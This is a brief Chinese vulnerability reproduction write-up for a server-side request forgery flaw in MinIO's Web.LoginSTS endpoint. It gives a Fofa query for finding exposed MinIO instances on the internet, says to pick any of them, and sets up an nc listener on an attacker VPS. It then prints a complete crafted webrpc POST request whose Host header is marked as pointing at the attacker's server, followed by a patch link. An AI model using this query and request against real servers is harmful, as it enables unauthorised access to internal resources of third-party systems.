一：介绍

MinIO 是一个基于Apache License v2.0开源协议的对象存储服务。它兼容亚马逊S3云存储服务接口，非常适合于存储大容量非结构化的数据，例如图片、视频、日志文件、备份数据和容器/虚拟机镜像等，而一个对象文件可以是任意大小，从几kb到最大5T不等。

MinIO是一个非常轻量的服务,可以很简单的和其他应用的结合，类似 NodeJS, Redis 或者 MySQL。

二：漏洞详情

由于MinIO组件中LoginSTS接口设计不当，导致存在服务器端请求伪造漏洞

攻击者可以通过构造URL来发起服务器端请求伪造攻击成功利用此漏洞的攻击者能够通过利用服务器上的功能来读取、更新内部资源

三：漏洞复现

步骤一：Fofa搜索一下内容，并随便打开一个网页

title="MinIO Browser"

步骤二：在VPS上开启监听并在抓包重新构造...

POST /minio/webrpc HTTP/1.1
Host: ip:1234    //指向黑客VPS地址与NC监听端口号
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
x-amz-date: 20210824T074454Z
Content-Length: 60
Origin: http://*.*.*.*:9000
Connection: close
Referer: http://*.*.*.*:9000/minio/login

{"id":1,"jsonrpc":"2.0","params":{},"method":"Web.LoginSTS"}    //需要修改Method字段

四：修补建议

升级minio，打补丁：https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q

参考连接：

• https://www.o2oxy.cn/3104.html